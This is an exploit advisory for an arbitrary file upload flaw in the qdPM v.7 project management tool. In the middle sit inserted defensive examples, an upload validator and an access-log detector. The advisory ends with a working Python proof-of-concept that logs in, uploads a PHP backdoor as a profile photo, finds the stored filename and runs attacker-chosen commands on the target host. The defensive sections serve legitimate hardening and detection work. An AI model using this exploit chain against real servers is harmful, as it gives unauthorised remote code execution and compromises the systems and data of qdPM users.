Title: qdPM v.7 Arbitrary File upload
Author: loneferret
Affected Versions: 7
Developer URL: http://qdpm.net/
Test System Platform: Windows XP/XAMPP
Program introduction:
# Free project management tool for small teams
# qdPM is a free web-based project management tool suitable for a small team working on multiple projects.
# It is fully configurable. You can easily manage Projects, Tasks and People. Customers interact
# using a Ticket System that is integrated into Task management.
Defect Analysis:
# The application does not verify the file's extension when uploading an image for a user's profile,
# making it possible to upload a small PHP shell and access it remotely.
# Note(s):
# One needs a valid user account to upload the file. (A client account will do.)
# No need to be authenticated to access the file.
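The root cause is that the profile-photo handler trusts the client-supplied filename. The validator below is an added example, not qdPM's own code: it accepts only a single allow-listed image extension (so "a.php.jpg" and ".htaccess" are refused), checks that the body's magic bytes match that extension, refuses bodies carrying a PHP open tag (image/PHP polyglots), and stores the file under a server-generated random name. The 2 MiB cap, the function names and the sample payloads are assumptions made for illustration.

```python
import os
import secrets

# Allow-listed profile-image extensions and the magic bytes each must start with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_SIZE = 2 * 1024 * 1024  # 2 MiB cap for an avatar (assumed limit)

# Constructed sample payloads used by the demo below (not real uploads).
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + bytes(32)
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + bytes(32)
PHP_SAMPLE = b"<?php echo 1; ?>"


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message is safe to log."""


def validate_profile_image(client_name, data):
    """Validate an uploaded avatar and return the server-chosen filename to store it under.

    Checks, in order: size, exactly one allow-listed extension, magic bytes
    consistent with that extension, and no PHP open tag anywhere in the body.
    The client's filename never reaches disk; a random hex name with a
    normalised extension does.
    """
    if len(data) > MAX_SIZE:
        raise UploadRejected("file too large")
    # Keep only the final path component; client-supplied separators are not trusted.
    base = os.path.basename(client_name.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        raise UploadRejected("filename must be name.ext with exactly one extension")
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected("extension not allowed: %s" % ext)
    if not any(data.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match a %s image" % ext)
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("script open tag embedded in image data")
    stored_ext = "jpg" if ext == "jpeg" else ext
    return "%s.%s" % (secrets.token_hex(16), stored_ext)


def is_accepted(client_name, data):
    """Boolean wrapper around the validator, convenient for tests and demos."""
    try:
        validate_profile_image(client_name, data)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    cases = [
        ("avatar.png", PNG_SAMPLE),
        ("backdoor.php", PHP_SAMPLE),
        ("shell.php.jpg", JPEG_SAMPLE),
        ("shell.jpg", PHP_SAMPLE),
        ("poly.gif", b"GIF89a" + PHP_SAMPLE),
    ]
    for name, body in cases:
        try:
            print("%-15s -> stored as %s" % (name, validate_profile_image(name, body)))
        except UploadRejected as err:
            print("%-15s -> rejected: %s" % (name, err))
```

Requiring exactly one dot deliberately rejects legitimate names such as "my.photo.png"; that trade-off is cheap for avatars and removes the whole class of multi-extension tricks. Validation is only half of the fix: the uploads directory should also be served with script execution disabled (or from outside the web root), so that a file that slips through is still never interpreted.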
Upload files:
After logging on, upload the file here:
# Page: /qdPM/index.php/home/myAccount
# Access file:
# File can be found here:
# /qdPM/uploads/users/<filename>
#
# Note the filename will contain a random number. One needs
# to look at the source code from the browser to find it.
# For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" />
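Because the stored file is reachable without authentication, the web server's access log is where abuse of this flaw shows up: any request below /uploads/users/ for a path carrying a script extension is worth an alert, whatever the status code. The parser below is an added example (not part of the advisory): it reads Common/Combined Log Format lines and flags such requests, checking every extension in a multi-dotted name and every path segment, since Apache may hand "a.php.jpg" or "a.php/x.jpg" to the PHP interpreter. The log lines, addresses and timestamps are constructed for the demo.

```python
import re

# Extensions the server might hand to the PHP interpreter (assumed list; extend per deployment).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}
UPLOAD_PREFIX = "/uploads/users/"

# Common/Combined Log Format fields we need: client IP, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3})'
)

# Constructed sample log lines for the demo; hosts, times and names are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2011:13:55:36 +0000] "GET /qdPM/uploads/users/171793-avatar.jpg HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2011:13:55:40 +0000] "POST /qdPM/index.php/home/myAccount HTTP/1.1" 302 0
198.51.100.7 - - [10/Oct/2011:13:56:02 +0000] "GET /qdPM/uploads/users/171793-backdoor.php?cmd=id HTTP/1.1" 200 87
198.51.100.7 - - [10/Oct/2011:13:56:09 +0000] "GET /qdPM/uploads/users/171793-backdoor.PHP/x.jpg HTTP/1.1" 200 12
198.51.100.7 - - [10/Oct/2011:13:56:15 +0000] "GET /qdPM/uploads/users/probe.php.jpg HTTP/1.1" 404 0
"""


def is_script_path(path):
    """True if any path segment below the upload directory carries a script extension."""
    path = path.lower()
    idx = path.find(UPLOAD_PREFIX)
    if idx < 0:
        return False
    tail = path[idx + len(UPLOAD_PREFIX):]
    for segment in tail.split("/"):
        # "name.php.jpg" -> ["name", "php", "jpg"]; any part after the first counts.
        if any(part in SCRIPT_EXTS for part in segment.split(".")[1:]):
            return True
    return False


def suspicious_requests(log_text):
    """Parse log lines and return (ip, path, status) for script requests under the upload directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skipped here, but a real pipeline should count these
        path = m.group("target").split("?", 1)[0]  # drop the query string before matching
        if is_script_path(path):
            hits.append((m.group("ip"), path, m.group("status")))
    return hits


if __name__ == "__main__":
    for ip, path, status in suspicious_requests(SAMPLE_LOG):
        print("%s %s -> %s" % (ip, status, path))
```

A 404 is flagged on purpose: a probe for a script name under the upload directory is a signal even when the file is not there. Pair this with a periodic scan of the upload directory itself for files whose bytes begin with a PHP open tag, since a successful upload may precede any request for it.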
----- Python script -----
#!/usr/bin/python
# Python 2 proof of concept; requires the mechanize module.
import re, mechanize
import urllib, sys
print "\n[*] qdPM v.7 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

# Login into site (credentials are the test account from the author's test system)
try:
    print "[*] Logging in."
    br = mechanize.Browser()
    br.open("http://%s/qdPM/index.php/home/login" % rhost)
    assert br.viewing_html()
    br.select_form(name="UsersForm")
    br.select_form(nr=0)
    br.form['login[email]'] = "loneferret@test.com"
    br.form['login[password]'] = "123456"
    print "[*] Hope this works"
    br.submit()
except:
    print "[*] Oups..."
    exit(0)

# Upload malicious file through the profile-photo field of the account form
try:
    print "[*] Uploading shell.."
    br.open("http://%s/qdPM/home/myAccount" % rhost)
    assert br.viewing_html()
    br.select_form(name="UsersAccountForm")
    br.select_form(nr=0)
    br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]")
    br.submit(nr=0)
except:
    print "[-] Upload didn't work."
    exit(0)

# Get file name once saved (read back from the account form's photo control)
try:
    br.select_form(name="UsersAccountForm")
    for form in br.forms():
        filename = form.controls[9].value
    print "[*] Filename is now: " + filename
    url = "http://%s/qdPM/uploads/users" % rhost
    url += "/%s?cmd=%s" % (filename, rcmd)
    print "[*] Executing command:\n"
    resp = urllib.urlopen(url)
    print resp.read()
except:
    print "[-] Oups..."
    exit(0)